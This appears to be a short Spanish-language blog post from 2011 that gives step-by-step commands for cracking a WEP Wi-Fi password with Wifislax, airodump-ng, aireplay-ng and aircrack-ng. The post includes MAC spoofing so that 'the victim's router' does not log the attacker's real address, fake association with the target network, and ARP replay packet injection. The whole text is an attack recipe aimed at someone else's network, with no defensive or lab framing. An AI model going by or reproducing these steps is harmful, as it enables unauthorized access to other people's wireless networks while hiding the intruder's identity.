• WifiSlax

    Resumen rapido de los pasos a seguir:

    1. Wifislax > Asistencia chipset > Asistencia Intel Pro Wireless > Recargar modulo ipw 2200 inyeccion.
    2. iwconfig –> Para ver interfaces (ethx).
    3. airodump-ng -w captura rtap0 –> Se activa el sniffer o capturador de paquetes.

    Se abre una nueva consola o shell:

    1. kmdr-executor /usr/share/wifislax/macchanger-conf.kmdr –> Cambiamos la MAC de nuestro PC para que no se registre en el router de la victima nuestra verdadera MAC.
    2. iwconfig ethx essid “ESSID_A_CRACKEAR” channel z key 66666 –> Asociacion falsa a la red que queremos crackear (x y z se deben cambiar por los valores pertinentes).
    3. aireplay-ng -3 -x 1024 – b MAC_ROUTER_CRACKEAR -h 00:11:22:33:44:55 -i rtap ethx –> inyeccion de paquetes para capturar IVs
    4. Cuando los ARP Request esta en mas o menos 40 000, se para la inyeccion con CTRL + D.
    5. Se para el sniffer con CTRL + D (la 1ª shell).
    6. Se procede a crackear la contraseña a partir de la captura mediante aircrack-ng – z captura.cap.

    alvaro @ Lunes, 23 de mayo de 2011

    Tags: , , ,

  • Deja un comentario

    Nota: La administracion de comentarios esta activada por lo que la publicacion debe ser aprovada. Porfavor no reenvien comentarios en caso de no verlos publicados inmediatamente.